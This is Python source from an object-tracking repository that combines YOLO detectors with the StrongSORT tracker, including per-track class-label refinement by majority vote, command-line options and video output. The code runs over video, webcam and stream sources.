hide_labels=False, # hide labels
hide_conf=False, # hide confidences
hide_class=False, # hide IDs
half=False, # use FP16 half-precision inference
dnn=False, # use OpenCV DNN for ONNX inference
refinement_enabled=True, # flag to enable or disable refinement
refinement_threshold=0.5, # threshold for refining class labels
):
source = str(source)
save_img = not nosave and not source.endswith('.txt') # save inference images
is_file = Path(source).suffix[1:] in (VID_FORMATS)
is_url = source.lower().startswith(('rtsp://', 'rtmp://', 'http://', 'https://'))
webcam = source.isnumeric() or source.endswith('.txt') or (is_url and not is_file)
if is_url and is_file:
source = check_file(source) # download
# # Directories
if not isinstance(yolo_weights, list): # single yolo model
exp_name = yolo_weights.stem
elif type(yolo_weights) is list and len(yolo_weights) == 1: # single models after --yolo_weights
exp_name = Path(yolo_weights[0]).stem
yolo_weights = Path(yolo_weights[0])
else: # multiple models after --yolo_weights
exp_name = 'ensemble'
exp_name = name if name else exp_name + "_" + strong_sort_weights.stem
save_dir = increment_path(Path(project) / exp_name, exist_ok=exist_ok) # increment run
save_dir = Path(save_dir)
(save_dir / 'tracks' if save_txt else save_dir).mkdir(parents=True, exist_ok=True) # make dir
# # Load model
device = select_device(device)
# WEIGHTS.mkdir(parents=True, exist_ok=True)
model = YOLO(yolo_weights).to(device) # load yolo
    names = model.names  # class names (dict {index: name} for ultralytics YOLO models)
# stride = model.stride.max().cpu().numpy() # model stride
# imgsz = check_img_size(imgsz[0], s=stride) # check image size
# Dataloader
if webcam:
show_vid = check_imshow()
cudnn.benchmark = True # set True to speed up constant image size inference
dataset = LoadStreams(source, img_size=imgsz)
nr_sources = len(dataset.sources)
else:
dataset = LoadImages(source)
nr_sources = 1
vid_path, vid_writer, txt_path = [None] * nr_sources, [None] * nr_sources, [None] * nr_sources
# initialize StrongSORT
cfg = get_config()
cfg.merge_from_file(opt.config_strongsort)
# Create as many strong sort instances as there are video sources
strongsort_list = []
for i in range(nr_sources):
strongsort_list.append(
StrongSORT(
strong_sort_weights,
device,
half,
max_dist=cfg.STRONGSORT.MAX_DIST,
max_iou_distance=cfg.STRONGSORT.MAX_IOU_DISTANCE,
max_age=cfg.STRONGSORT.MAX_AGE,
n_init=cfg.STRONGSORT.N_INIT,
nn_budget=cfg.STRONGSORT.NN_BUDGET,
mc_lambda=cfg.STRONGSORT.MC_LAMBDA,
ema_alpha=cfg.STRONGSORT.EMA_ALPHA,
)
)
strongsort_list[i].model.warmup()
outputs = [None] * nr_sources
colors = [[random.randint(0, 255) for _ in range(3)] for _ in names]
# Run tracking
dt, seen = [0.0, 0.0, 0.0, 0.0], 0
curr_frames, prev_frames = [None] * nr_sources, [None] * nr_sources
# Initialize variables for FPS calculation
start_time = time()
frames_processed = 0
for frame_idx, (path, im, im0s, vid_cap) in enumerate(dataset):
if time() - start_time >= 1:
fps = frames_processed / (time() - start_time)
print(f'FPS: {fps:.2f}')
# Draw FPS on the frame
cv2.putText(im0, f'FPS: {fps:.2f}', (10, 50), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 0), 2)
# Reset variables for the next FPS calculation interval
start_time = time()
frames_processed = 0
# Increment the number of frames processed
frames_processed += 1
s = ''
t1 = time_sync()
im = torch.from_numpy(im).to(device)
im = im.half() if half else im.float() # uint8 to fp16/32
im /= 255.0 # 0 - 255 to 0.0 - 1.0
if len(im.shape) == 3:
im = im[None] # expand for batch dim
t2 = time_sync()
dt[0] += t2 - t1
# Inference
visualize = increment_path(save_dir / Path(path[0]).stem, mkdir=True) if visualize else False
pred = model.predict(im, augment=augment, conf=conf_thres, iou=iou_thres,save_crop=save_crop,name=name, project=project,exist_ok=True)
t3 = time_sync()
dt[1] += t3 - t2
# Apply NMS
# pred = non_max_suppression(pred[0], conf_thres, iou_thres, classes, agnostic_nms)
dt[2] += time_sync() - t3
# Process detections
for i, det in enumerate(pred): # detections per image
# txt_file_name = p.stem if not webcam else p.stem + f'_{i}' # Differentiate text file names for multiple videos
# save_path = str(save_dir / p.stem) if not webcam else str(save_dir / p.stem) + f'_{i}' # Differentiate video save paths for multiple videos
seen += 1
if webcam: # nr_sources >= 1
p, im0, _ = path[i], im0s[i].copy(), dataset.count
p = Path(p) # to Path
s += f'{i}: '
txt_file_name = p.name
save_path = str(save_dir / p.name) + str(i) # im.jpg, vid.mp4, ...
else:
p, im0, _ = path, im0s.copy(), getattr(dataset, 'frame', 0)
p = Path(p) # to Path
# video file
if source.endswith(VID_FORMATS):
txt_file_name = p.stem
save_path = str(save_dir / p.name) # im.jpg, vid.mp4, ...
# folder with imgs
else:
txt_file_name = p.name.split('.')[0] # get folder name containing current img
save_path = str(save_dir / p.name) # im.jpg, vid.mp4, ...
curr_frames[i] = im0
txt_path = str(save_dir / 'tracks' / txt_file_name) # im.txt
s += '%gx%g ' % im.shape[2:] # print string
imc = im0.copy() if save_crop else im0 # for save_crop
if cfg.STRONGSORT.ECC: # camera motion compensation
strongsort_list[i].tracker.camera_update(prev_frames[i], curr_frames[i])
if det is not None and len(det):
# # Rescale boxes from img_size to im0 size
# det[:, :4] = scale_coords(im.shape[2:], det[:, :4], im0.shape).round()
# # Print results
# for c in det[:, -1].unique():
# n = (det[:, -1] == c).sum() # detections per class
# s += f"{n} {names[int(c)]}{'s' * (n > 1)}, " # add to string
xywhs = det.boxes.xywh
confs = det.boxes.conf
clss = det.boxes.cls
# pass detections to strongsort
t4 = time_sync()
outputs[i] = strongsort_list[i].update(xywhs.cpu(), confs.cpu(), clss.cpu(), im0)
t5 = time_sync()
dt[3] += t5 - t4
if refinement_enabled:
refined_labels = track_and_refine_classes( outputs[i], refinement_threshold)
# draw boxes for visualization
if len(outputs[i]) > 0:
for j, (output, conf) in enumerate(zip(outputs[i], confs)):
bboxes = output[0:4]
id = output[4]
cls = output[5]
# update class label if refinement is enabled
if refinement_enabled:
                            cls = refined_labels.get(id, cls)  # keep the original class if this track was not refined
if save_txt:
# Append index to differentiate text files for multiple videos
bbox_left = output[0]
bbox_top = output[1]
bbox_w = output[2] - output[0]
bbox_h = output[3] - output[1]
txt_path = str(save_dir / 'tracks' / (txt_file_name + f'_{i}.txt'))
with open(txt_path, 'a') as file:
file.write(f'{p.stem} {frame_idx} {id} {bbox_left} {bbox_top} {bbox_w} {bbox_h} {conf:.2f} {cls}\n')
# if save_txt:
# # to MOT format
# bbox_left = output[0]
# bbox_top = output[1]
# bbox_w = output[2] - output[0]
# bbox_h = output[3] - output[1]
# # format video_name frame id xmin ymin width height score class
# with open(txt_path + '.txt', 'a') as file:
# file.write(f'{p.stem} {frame_idx} {id} {bbox_left} {bbox_top} {bbox_w} {bbox_h} {conf:.2f} {cls}\n')
if save_vid or save_crop or show_vid: # Add bbox to image
c = int(cls) # integer class
id = int(id) # integer id
label = None if hide_labels else (f'{id} {names[c]}' if hide_conf else \
(f'{id} {conf:.2f}' if hide_class else f'{id} {names[c]} {conf:.2f}'))
plot_one_box(bboxes, im0, label=label, color=colors[int(cls)], line_thickness=2)
print(f'{s}Done. YOLO:({t3 - t2:.3f}s), StrongSORT:({t5 - t4:.3f}s)')
else:
strongsort_list[i].increment_ages()
print('No detections')
# Stream results
if show_vid:
cv2.imshow(str(p), im0)
cv2.waitKey(1) # 1 millisecond
# Save results (image with detections)
if save_img:
if dataset.mode == 'image':
cv2.imwrite(save_path, im0)
else: # 'video' or 'stream'
if vid_path[i] != save_path: # new video
vid_path[i] = save_path
if isinstance(vid_writer[i], cv2.VideoWriter):
vid_writer[i].release() # release previous video writer
if vid_cap: # video
fps = vid_cap.get(cv2.CAP_PROP_FPS)
w = int(vid_cap.get(cv2.CAP_PROP_FRAME_WIDTH))
h = int(vid_cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
else: # stream
fps, w, h = 30, im0.shape[1], im0.shape[0]
save_path = str(Path(save_path).with_suffix('.mp4')) # force *.mp4 suffix on results videos
vid_writer[i] = cv2.VideoWriter(save_path, cv2.VideoWriter_fourcc(*'mp4v'), fps, (w, h))
vid_writer[i].write(im0)
prev_frames[i] = curr_frames[i]
# Print results
t = tuple(x / seen * 1E3 for x in dt) # speeds per image
print(f'Speed: %.1fms pre-process, %.1fms inference, %.1fms NMS, %.1fms strong sort update per image at shape {(1, 3, imgsz, imgsz)}' % t)
if save_txt or save_vid:
s = f"\n{len(list(save_dir.glob('tracks/*.txt')))} tracks saved to {save_dir / 'tracks'}" if save_txt else ''
print(f"Results saved to {colorstr('bold', save_dir)}{s}")
if update:
strip_optimizer(yolo_weights) # update model (to fix SourceChangeWarning)
def parse_opt():
parser = argparse.ArgumentParser()
parser.add_argument('--yolo-weights', nargs='+', type=str, default=WEIGHTS / 'yolov7.pt', help='model.pt path(s)')
parser.add_argument('--strong-sort-weights', type=str, default=WEIGHTS / 'osnet_x0_25_msmt17.pt')
parser.add_argument('--config-strongsort', type=str, default='strong_sort/configs/strong_sort.yaml')
parser.add_argument('--source', type=str, default='0', help='file/dir/URL/glob, 0 for webcam')
parser.add_argument('--imgsz', '--img', '--img-size', nargs='+', type=int, default=[640], help='inference size h,w')
parser.add_argument('--conf-thres', type=float, default=0.5, help='confidence threshold')
parser.add_argument('--iou-thres', type=float, default=0.5, help='NMS IoU threshold')
parser.add_argument('--max-det', type=int, default=1000, help='maximum detections per image')
parser.add_argument('--device', default='', help='cuda device, i.e. 0 or 0,1,2,3 or cpu')
parser.add_argument('--show-vid', action='store_true', help='display tracking video results')
parser.add_argument('--save-txt', action='store_true', help='save results to *.txt')
parser.add_argument('--save-conf', action='store_true', help='save confidences in --save-txt labels')
parser.add_argument('--save-crop', action='store_true', help='save cropped prediction boxes')
parser.add_argument('--save-vid', action='store_true', help='save video tracking results')
parser.add_argument('--nosave', action='store_true', help='do not save images/videos')
    # class 0 is person, 1 is bicycle, 2 is car... 79 is oven
parser.add_argument('--classes', nargs='+', type=int, help='filter by class: --classes 0, or --classes 0 2 3')
parser.add_argument('--agnostic-nms', action='store_true', help='class-agnostic NMS')
parser.add_argument('--augment', action='store_true', help='augmented inference')
parser.add_argument('--visualize', action='store_true', help='visualize features')
parser.add_argument('--update', action='store_true', help='update all models')
parser.add_argument('--project', default=ROOT / 'runs/track', help='save results to project/name')
parser.add_argument('--name', default='exp', help='save results to project/name')
parser.add_argument('--exist-ok', action='store_true', help='existing project/name ok, do not increment')
parser.add_argument('--line-thickness', default=3, type=int, help='bounding box thickness (pixels)')
parser.add_argument('--hide-labels', default=False, action='store_true', help='hide labels')
parser.add_argument('--hide-conf', default=False, action='store_true', help='hide confidences')
parser.add_argument('--hide-class', default=False, action='store_true', help='hide IDs')
parser.add_argument('--half', action='store_true', help='use FP16 half-precision inference')
parser.add_argument('--dnn', action='store_true', help='use OpenCV DNN for ONNX inference')
opt = parser.parse_args()
opt.imgsz *= 2 if len(opt.imgsz) == 1 else 1 # expand
return opt
def main(opt):
check_requirements(requirements=ROOT / 'requirements.txt', exclude=('tensorboard', 'thop'))
run(**vars(opt))
if __name__ == "__main__":
opt = parse_opt()
main(opt)
# ======================================================================
# Refinement_trackv9.py  (TheNobody-12_MOT_WITH_YOLOV9_STRONG_SORT/Refinement_trackv9.py)
# ======================================================================
import argparse
import os
# limit the number of cpus used by high performance libraries
os.environ["OMP_NUM_THREADS"] = "1"
os.environ["OPENBLAS_NUM_THREADS"] = "1"
os.environ["MKL_NUM_THREADS"] = "1"
os.environ["VECLIB_MAXIMUM_THREADS"] = "1"
os.environ["NUMEXPR_NUM_THREADS"] = "1"
import platform
import sys
import numpy as np
from pathlib import Path
import torch
import torch.backends.cudnn as cudnn
from numpy import random
from time import time
FILE = Path(__file__).resolve()
ROOT = FILE.parents[0] # yolov5 strongsort root directory
WEIGHTS = ROOT / 'weights'
if str(ROOT) not in sys.path:
sys.path.append(str(ROOT)) # add ROOT to PATH
if str(ROOT / 'yolov9') not in sys.path:
    sys.path.append(str(ROOT / 'yolov9'))  # add yolov9 ROOT to PATH
if str(ROOT / 'strong_sort') not in sys.path:
sys.path.append(str(ROOT / 'strong_sort')) # add strong_sort ROOT to PATH
ROOT = Path(os.path.relpath(ROOT, Path.cwd())) # relative
from yolov9.models.experimental import attempt_load
from yolov9.models.common import DetectMultiBackend
from yolov9.utils.dataloaders import LoadImages, LoadStreams, LoadScreenshots
from yolov9.utils.general import (LOGGER, Profile, check_file, check_img_size, check_imshow, check_requirements, colorstr, cv2,
increment_path, non_max_suppression, print_args, scale_boxes, strip_optimizer, xyxy2xywh)
from yolov9.utils.torch_utils import select_device, time_sync, smart_inference_mode
from yolov9.utils.plots import Annotator, colors, save_one_box
from strong_sort.utils.parser import get_config
from strong_sort.strong_sort import StrongSORT
VID_FORMATS = 'asf', 'avi', 'gif', 'm4v', 'mkv', 'mov', 'mp4', 'mpeg', 'mpg', 'ts', 'wmv' # include video suffixes
def plot_one_box(x, img, color=None, label=None, line_thickness=3):
# Plots one bounding box on image img
tl = line_thickness or round(0.002 * (img.shape[0] + img.shape[1]) / 2) + 1 # line/font thickness
color = color or [random.randint(0, 255) for _ in range(3)]
c1, c2 = (int(x[0]), int(x[1])), (int(x[2]), int(x[3]))
cv2.rectangle(img, c1, c2, color, thickness=tl, lineType=cv2.LINE_AA)
if label:
tf = max(tl - 1, 1) # font thickness
t_size = cv2.getTextSize(label, 0, fontScale=tl / 3, thickness=tf)[0]
c2 = c1[0] + t_size[0], c1[1] - t_size[1] - 3
cv2.rectangle(img, c1, c2, color, -1, cv2.LINE_AA) # filled
cv2.putText(img, label, (c1[0], c1[1] - 2), 0, tl / 3, [225, 255, 255], thickness=tf, lineType=cv2.LINE_AA)
def track_and_refine_classes(outputs, threshold):
refined_labels = {}
    # outputs is a list of detection tuples; each tuple contains:
    # (x_min, y_min, x_max, y_max, track_id, class_label, confidence)
track_ids = []
tracklets = {}
# Create a dictionary of tracklets
for detection in outputs:
track_id = detection[4]
if track_id not in tracklets:
tracklets[track_id] = []
tracklets[track_id].append(detection)
track_ids.append(track_id)
# Remove duplicate track ids
track_ids = list(set(track_ids))
# Refine class labels for each tracklet
for track_id in track_ids:
tracklet = tracklets[track_id]
class_counts = {}
total_detections = len(tracklet)
for detection in tracklet:
class_label = detection[5]
if class_label not in class_counts:
class_counts[class_label] = 0
class_counts[class_label] += 1
# Determine the majority class and refine labels if necessary
if class_counts:
majority_class = max(class_counts, key=class_counts.get)
majority_frequency = class_counts[majority_class] / total_detections
if majority_frequency >= threshold:
for detection in tracklet:
refined_labels[track_id] = majority_class
return refined_labels
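# Worked example with hypothetical values: if outputs held three detections of track id 7
# (e.g. accumulated over several frames) labelled class 2, 2 and 5:
#   outputs = [(10, 20, 50, 80, 7, 2, 0.9),
#              (11, 21, 51, 81, 7, 2, 0.8),
#              (12, 22, 52, 82, 7, 5, 0.4)]
#   track_and_refine_classes(outputs, threshold=0.5)
#   # class 2 covers 2/3 >= 0.5 of track 7's detections -> {7: 2}
# Unlike the frame-level variant above, the vote here is taken independently for each track id.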
@smart_inference_mode()
def run(
source='0',
data = ROOT / 'data/coco.yaml', # data.yaml path
yolo_weights=WEIGHTS / 'yolo.pt', # model.pt path(s),
strong_sort_weights=WEIGHTS / 'osnet_x0_25_msmt17.pt', # model.pt path,
config_strongsort=ROOT / 'strong_sort/configs/strong_sort.yaml',
imgsz=(640, 640), # inference size (height, width)
conf_thres=0.25, # confidence threshold
iou_thres=0.45, # NMS IOU threshold
max_det=1000, # maximum detections per image
device='', # cuda device, i.e. 0 or 0,1,2,3 or cpu
view_img=False, # show results
save_txt=False, # save results to *.txt
save_conf=False, # save confidences in --save-txt labels
save_crop=False, # save cropped prediction boxes
nosave=False, # do not save images/videos
classes=None, # filter by class: --class 0, or --class 0 2 3
agnostic_nms=False, # class-agnostic NMS
augment=False, # augmented inference
visualize=False, # visualize features
update=False, # update all models
project=ROOT / 'runs/track', # save results to project/name
name='exp', # save results to project/name
exist_ok=False, # existing project/name ok, do not increment
line_thickness=3, # bounding box thickness (pixels)
hide_labels=False, # hide labels
hide_conf=False, # hide confidences
half=False, # use FP16 half-precision inference
dnn=False, # use OpenCV DNN for ONNX inference
vid_stride=1, # video frame-rate stride
refinement_enabled=True, # flag to enable or disable refinement
refinement_threshold=0.5, # threshold for refining class labels
):
source = str(source)
save_img = not nosave and not source.endswith('.txt') # save inference images
is_file = Path(source).suffix[1:] in (VID_FORMATS)
is_url = source.lower().startswith(('rtsp://', 'rtmp://', 'http://', 'https://'))
webcam = source.isnumeric() or source.endswith('.txt') or (is_url and not is_file)
screenshot = source.lower().startswith('screen')
if is_url and is_file:
source = check_file(source) # download
# Directories
if not isinstance(yolo_weights, list): # single yolo model
exp_name = yolo_weights.stem
elif type(yolo_weights) is list and len(yolo_weights) == 1: # single models after --yolo_weights
exp_name = Path(yolo_weights[0]).stem
yolo_weights = Path(yolo_weights[0])
else: # multiple models after --yolo_weights
exp_name = 'ensemble'
exp_name = name if name else exp_name + "_" + strong_sort_weights.stem
save_dir = increment_path(Path(project) / exp_name, exist_ok=exist_ok) # increment run
save_dir = Path(save_dir)
(save_dir / 'tracks' if save_txt else save_dir).mkdir(parents=True, exist_ok=True) # make dir
# Load model
device = select_device(device)
model = DetectMultiBackend(yolo_weights, device=device, dnn=dnn, data=data, fp16=half)
stride, names, pt = model.stride, model.names, model.pt
imgsz = check_img_size(imgsz, s=stride) # check image size
    # Dataloader
bs = 1 # batch_size
if webcam:
view_img = check_imshow(warn=True)
dataset = LoadStreams(source, img_size=imgsz, stride=stride, auto=pt, vid_stride=vid_stride)
bs = len(dataset)
elif screenshot:
dataset = LoadScreenshots(source, img_size=imgsz, stride=stride, auto=pt)
else:
dataset = LoadImages(source, img_size=imgsz, stride=stride, auto=pt, vid_stride=vid_stride)
vid_path, vid_writer,txt_path = [None] * bs, [None] * bs, [None] * bs
# initialize StrongSORT
cfg = get_config()
cfg.merge_from_file(opt.config_strongsort)
# Create as many strong sort instances as there are video sources
strongsort_list = []
for i in range(bs):
strongsort_list.append(
StrongSORT(
strong_sort_weights,
device,
half,
max_dist=cfg.STRONGSORT.MAX_DIST,
max_iou_distance=cfg.STRONGSORT.MAX_IOU_DISTANCE,
max_age=cfg.STRONGSORT.MAX_AGE,
n_init=cfg.STRONGSORT.N_INIT,
nn_budget=cfg.STRONGSORT.NN_BUDGET,
mc_lambda=cfg.STRONGSORT.MC_LAMBDA,
ema_alpha=cfg.STRONGSORT.EMA_ALPHA,
)
)
strongsort_list[i].model.warmup()
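    # Rough meaning of the StrongSORT settings above (standard DeepSORT-style parameters; see the tracker config):
    #   MAX_DIST         - appearance-embedding distance gate for matching detections to existing tracks
    #   MAX_IOU_DISTANCE - IoU gate used in the fallback association step
    #   MAX_AGE          - frames a lost track is kept alive before it is deleted
    #   N_INIT           - consecutive hits required before a new track is confirmed
    #   NN_BUDGET        - number of appearance features remembered per track
    #   MC_LAMBDA / EMA_ALPHA - motion-cost weighting and feature EMA smoothing (StrongSORT additions)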
outputs = [None] * bs
colors = [[random.randint(0, 255) for _ in range(3)] for _ in names]
# Run tracking
model.warmup(imgsz=(1 if pt or model.triton else bs, 3, *imgsz)) # warmup
seen, windows, dt,sdt = 0, [], (Profile(), Profile(), Profile(), Profile()),[0.0, 0.0, 0.0, 0.0]
curr_frames, prev_frames = [None] * bs, [None] * bs
for frame_idx, (path, im, im0s, vid_cap, s) in enumerate(dataset):
# s = ''
t1 = time_sync()
with dt[0]:
im = torch.from_numpy(im).to(model.device)
im = im.half() if model.fp16 else im.float() # uint8 to fp16/32
im /= 255 # 0 - 255 to 0.0 - 1.0
if len(im.shape) == 3:
im = im[None] # expand for batch dim
t2 = time_sync()
sdt[0] += t2 - t1
# Inference
with dt[1]:
visualize = increment_path(save_dir / Path(path).stem, mkdir=True) if visualize else False
pred = model(im, augment=augment, visualize=visualize)
pred = pred[0][1]
t3 = time_sync()
sdt[1] += t3 - t2
# Apply NMS
with dt[2]:
pred = non_max_suppression(pred, conf_thres, iou_thres, classes, agnostic_nms, max_det=max_det)
sdt[2] += time_sync() - t3
# Second-stage classifier (optional)
# pred = utils.general.apply_classifier(pred, classifier_model, im, im0s)
# Process detections
for i, det in enumerate(pred): # detections per image
seen += 1
if webcam: # bs >= 1
p, im0, _ = path[i], im0s[i].copy(), dataset.count
p = Path(p) # to Path
s += f'{i}: '
# txt_file_name = p.name
txt_file_name = p.stem + f'_{i}' # Unique text file name
# save_path = str(save_dir / p.name) + str(i) # im.jpg, vid.mp4, ...
save_path = str(save_dir / p.stem) + f'_{i}' # Unique video file name
else:
p, im0, _ = path, im0s.copy(), getattr(dataset, 'frame', 0)
p = Path(p) # to Path
# video file
if source.endswith(VID_FORMATS):
txt_file_name = p.stem
save_path = str(save_dir / p.name) # im.jpg, vid.mp4, ...
# folder with imgs
else:
txt_file_name = p.parent.name # get folder name containing current img
save_path = str(save_dir / p.parent.name) # im.jpg, vid.mp4, ...
curr_frames[i] = im0
txt_path = str(save_dir / 'tracks' / txt_file_name) # im.txt
s += '%gx%g ' % im.shape[2:] # print string
gn = torch.tensor(im0.shape)[[1, 0, 1, 0]] # normalization gain whwh
imc = im0.copy() if save_crop else im0 # for save_crop
annotator = Annotator(im0, line_width=line_thickness, example=str(names))
if cfg.STRONGSORT.ECC: # camera motion compensation
strongsort_list[i].tracker.camera_update(prev_frames[i], curr_frames[i])
if det is not None and len(det):
# Rescale boxes from img_size to im0 size
det[:, :4] = scale_boxes(im.shape[2:], det[:, :4], im0.shape).round()
# Print results
for c in det[:, -1].unique():
n = (det[:, -1] == c).sum() # detections per class
s += f"{n} {names[int(c)]}{'s' * (n > 1)}, " # add to string
xywhs = xyxy2xywh(det[:, 0:4])
confs = det[:, 4]
clss = det[:, 5]
# pass detections to strongsort
t4 = time_sync()
outputs[i] = strongsort_list[i].update(xywhs.cpu(), confs.cpu(), clss.cpu(), im0)
t5 = time_sync()
sdt[3] += t5 - t4
if refinement_enabled:
refined_labels = track_and_refine_classes( outputs[i], refinement_threshold)
# Write results
for j, (output, conf) in enumerate(zip(outputs[i], confs)):
xyxy = output[0:4]
id = output[4]
cls = output[5]
                        # update class label if refinement is enabled; fall back to the detector class otherwise
                        rcls = cls
                        if refinement_enabled and id in refined_labels:
                            rcls = refined_labels[id]
# for *xyxy, conf, cls in reversed(det):
if save_txt: # Write to file
xywh = (xyxy2xywh(torch.tensor(xyxy).view(1, 4)) / gn).view(-1).tolist() # normalized xywh
# line = (id , cls, *xywh, conf) if save_conf else (cls, *xywh) # label format
line = ( int(p.stem), frame_idx, id , rcls, *xywh, conf) if save_conf else ( p.stem, frame_idx, cls, *xywh) # label format
with open(txt_path + '.txt', 'a') as file:
file.write(('%g ' * len(line) + '\n') % line)
if save_img or save_crop or view_img: # Add bbox to image
c = int(rcls) # integer class
label = None if hide_labels else (names[c] if hide_conf else f' { id } {names[c]} {conf:.2f}')
plot_one_box(xyxy, im0, label=label, color=colors[int(cls)], line_thickness=2)
if save_crop:
save_one_box(xyxy, imc, file=save_dir / 'crops' / names[c] / f'{p.stem}.jpg', BGR=True)
# # draw boxes for visualization
# if len(outputs[i]) > 0:
# for j, (output, conf) in enumerate(zip(outputs[i], confs)):
# bboxes = output[0:4]
# id = output[4]
# cls = output[5]
# if save_txt:
# # to MOT format
# bbox_left = output[0]
# bbox_top = output[1]
# bbox_w = output[2] - output[0]
# bbox_h = output[3] - output[1]
# # format video_name frame id xmin ymin width height score class
# with open(txt_path + '.txt', 'a') as file:
# file.write(f'{p.stem} {frame_idx} {id} {bbox_left} {bbox_top} {bbox_w} {bbox_h} {conf:.2f} {cls}\n')
# if save_img or save_crop or view_img: # Add bbox to image
# c = int(cls) # integer class
# id = int(id) # integer id
# label = None if hide_labels else (names[c] if hide_conf else f'{names[c]} {conf:.2f}')
# plot_one_box(bboxes, im0, label=label, color=colors[int(cls)], line_thickness=2)
# if save_crop:
# txt_file_name = txt_file_name if (isinstance(path, list) and len(path) > 1) else ''
# save_one_box(bboxes, imc, file=save_dir / 'crops' / txt_file_name / names[c] / f'{id}' / f'{p.stem}.jpg', BGR=True)
print(f'{s}Done. YOLO:({t3 - t2:.3f}s), StrongSORT:({t5 - t4:.3f}s)')
else:
strongsort_list[i].increment_ages()
print('No detections')
# Stream results
im0 = annotator.result()
if view_img:
if platform.system() == 'Linux' and p not in windows:
windows.append(p)
cv2.namedWindow(str(p), cv2.WINDOW_NORMAL | cv2.WINDOW_KEEPRATIO) # allow window resize (Linux)
cv2.resizeWindow(str(p), im0.shape[1], im0.shape[0])
cv2.imshow(str(p), im0)
cv2.waitKey(1) # 1 millisecond
# Save results (image with detections)
if save_img:
if dataset.mode == 'image':
cv2.imwrite(save_path, im0)
else: # 'video' or 'stream'
if vid_path[i] != save_path: # new video
vid_path[i] = save_path
if isinstance(vid_writer[i], cv2.VideoWriter):
vid_writer[i].release() # release previous video writer
if vid_cap: # video
fps = vid_cap.get(cv2.CAP_PROP_FPS)
w = int(vid_cap.get(cv2.CAP_PROP_FRAME_WIDTH))
h = int(vid_cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
else: # stream
fps, w, h = 30, im0.shape[1], im0.shape[0]
save_path = str(Path(save_path).with_suffix('.mp4')) # force *.mp4 suffix on results videos
vid_writer[i] = cv2.VideoWriter(save_path, cv2.VideoWriter_fourcc(*'mp4v'), fps, (w, h))
vid_writer[i].write(im0)
prev_frames[i] = curr_frames[i]
# Print time (inference-only)
LOGGER.info(f"{s}{'' if len(det) else '(no detections), '}{dt[1].dt * 1E3:.1f}ms")
# Print results
    LOGGER.info('Speed: %.1fms pre-process, %.1fms inference, %.1fms NMS, %.1fms StrongSORT update per image' % tuple(1E3 * x / seen for x in sdt))
if save_txt or save_img:
        s = f"\n{len(list(save_dir.glob('tracks/*.txt')))} tracks saved to {save_dir / 'tracks'}" if save_txt else ''
LOGGER.info(f"Results saved to {colorstr('bold', save_dir)}{s}")
if update:
strip_optimizer(yolo_weights[0]) # update model (to fix SourceChangeWarning)
def parse_opt():
parser = argparse.ArgumentParser()
parser.add_argument('--yolo-weights', nargs='+', type=str, default=WEIGHTS / 'yolov9.pt', help='model.pt path(s)')
parser.add_argument('--strong-sort-weights', type=str, default=WEIGHTS / 'osnet_x0_25_msmt17.pt')
parser.add_argument('--config-strongsort', type=str, default='strong_sort/configs/strong_sort.yaml')
parser.add_argument('--source', type=str, default='0', help='file/dir/URL/glob, 0 for webcam')
parser.add_argument('--data', type=str, default=ROOT / 'data/coco128.yaml', help='(optional) dataset.yaml path')
parser.add_argument('--imgsz', '--img', '--img-size', nargs='+', type=int, default=[640], help='inference size h,w')
parser.add_argument('--conf-thres', type=float, default=0.5, help='confidence threshold')
parser.add_argument('--iou-thres', type=float, default=0.5, help='NMS IoU threshold')
parser.add_argument('--max-det', type=int, default=1000, help='maximum detections per image')
parser.add_argument('--device', default='', help='cuda device, i.e. 0 or 0,1,2,3 or cpu')
parser.add_argument('--view-img', action='store_true', help='show results')
parser.add_argument('--save-txt', action='store_true', help='save results to *.txt')
parser.add_argument('--save-conf', action='store_true', help='save confidences in --save-txt labels')
parser.add_argument('--save-crop', action='store_true', help='save cropped prediction boxes')
parser.add_argument('--nosave', action='store_true', help='do not save images/videos')
    # class 0 is person, 1 is bicycle, 2 is car... 79 is oven
parser.add_argument('--classes', nargs='+', type=int, help='filter by class: --classes 0, or --classes 0 2 3')
parser.add_argument('--agnostic-nms', action='store_true', help='class-agnostic NMS')
parser.add_argument('--augment', action='store_true', help='augmented inference')
parser.add_argument('--visualize', action='store_true', help='visualize features')
parser.add_argument('--update', action='store_true', help='update all models')
parser.add_argument('--project', default=ROOT / 'runs/track', help='save results to project/name')
parser.add_argument('--name', default='exp', help='save results to project/name')
parser.add_argument('--exist-ok', action='store_true', help='existing project/name ok, do not increment')
parser.add_argument('--line-thickness', default=3, type=int, help='bounding box thickness (pixels)')
parser.add_argument('--hide-labels', default=False, action='store_true', help='hide labels')
parser.add_argument('--hide-conf', default=False, action='store_true', help='hide confidences')
parser.add_argument('--half', action='store_true', help='use FP16 half-precision inference')
parser.add_argument('--vid-stride', type=int, default=1, help='video frame-rate stride')
parser.add_argument('--dnn', action='store_true', help='use OpenCV DNN for ONNX inference')
opt = parser.parse_args()
opt.imgsz *= 2 if len(opt.imgsz) == 1 else 1 # expand
return opt
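# Illustrative invocation (substitute the actual script name and paths for your checkout):
#   python <this_script>.py --source video.mp4 --yolo-weights weights/yolov9.pt \
#       --strong-sort-weights weights/osnet_x0_25_msmt17.pt --save-txt --save-conf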
def main(opt):
# check_requirements(requirements=ROOT / 'requirements.txt', exclude=('tensorboard', 'thop'))
run(**vars(opt))
if __name__ == "__main__":
opt = parse_opt()
main(opt)
| 21,536 | Python | .py | 377 | 45.986737 | 150 | 0.581695 | TheNobody-12/MOT_WITH_YOLOV9_STRONG_SORT | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,106 | trackv9.py | TheNobody-12_MOT_WITH_YOLOV9_STRONG_SORT/trackv9.py | import argparse
import os
# limit the number of cpus used by high performance libraries
os.environ["OMP_NUM_THREADS"] = "1"
os.environ["OPENBLAS_NUM_THREADS"] = "1"
os.environ["MKL_NUM_THREADS"] = "1"
os.environ["VECLIB_MAXIMUM_THREADS"] = "1"
os.environ["NUMEXPR_NUM_THREADS"] = "1"
import platform
import sys
import numpy as np
from pathlib import Path
import torch
import torch.backends.cudnn as cudnn
from numpy import random
from time import time
FILE = Path(__file__).resolve()
ROOT = FILE.parents[0]  # yolov9 strongsort root directory
WEIGHTS = ROOT / 'weights'
if str(ROOT) not in sys.path:
sys.path.append(str(ROOT)) # add ROOT to PATH
if str(ROOT / 'yolov9') not in sys.path:
    sys.path.append(str(ROOT / 'yolov9'))  # add yolov9 ROOT to PATH
if str(ROOT / 'strong_sort') not in sys.path:
